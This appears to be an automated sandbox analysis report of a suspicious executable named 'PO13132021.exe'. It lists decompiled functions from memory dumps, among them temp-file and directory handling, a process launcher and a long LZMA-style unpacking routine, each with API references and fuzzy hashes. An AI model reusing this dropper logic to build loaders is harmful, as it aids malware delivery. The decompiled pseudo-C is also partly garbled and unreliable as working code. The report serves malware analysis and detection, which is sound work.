					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405df4
0x00405dfa
0x00405dfb
0x00405dfb
0x00405e00
0x00405e01
0x00405e04
0x00405e0e
0x00405e1b
0x00405e1e
0x00405e26
0x00000000
0x00000000
0x00405e2a
0x00000000
0x00000000
0x00405e2c
0x00000000
0x00405e2c
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405E04
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E1E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF3
"C:\Users\user\Desktop\PO13132021.exe" , xrefs: 00405DF0
nsa, xrefs: 00405DFB

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\PO13132021.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-765213042
Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C59(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405BEB(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405892(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405815(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp\\Nla", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405C59: CharNextA.USER32(?,?,00422158,?,00405CC5,00422158,00422158,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560,00000000), ref: 00405C67
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 00405815: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Nla,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp\Nla, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\Nla
API String ID: 1892508949-3135092921
Opcode ID: 4f4345dd9ea5b1c43c734929ae91401728168c4be3cc98aed60c332152ba3406
Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
Opcode Fuzzy Hash: 4f4345dd9ea5b1c43c734929ae91401728168c4be3cc98aed60c332152ba3406
Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E

Uniqueness

Uniqueness Score: -1.00%

Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058C7(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422558->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058d0
0x004058f0
0x004058f8
0x004058fd
0x00000000
0x00405903
0x00405907

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
CloseHandle.KERNEL32(?), ref: 004058FD

Strings

Error launching installer, xrefs: 004058DA

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406D5A() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
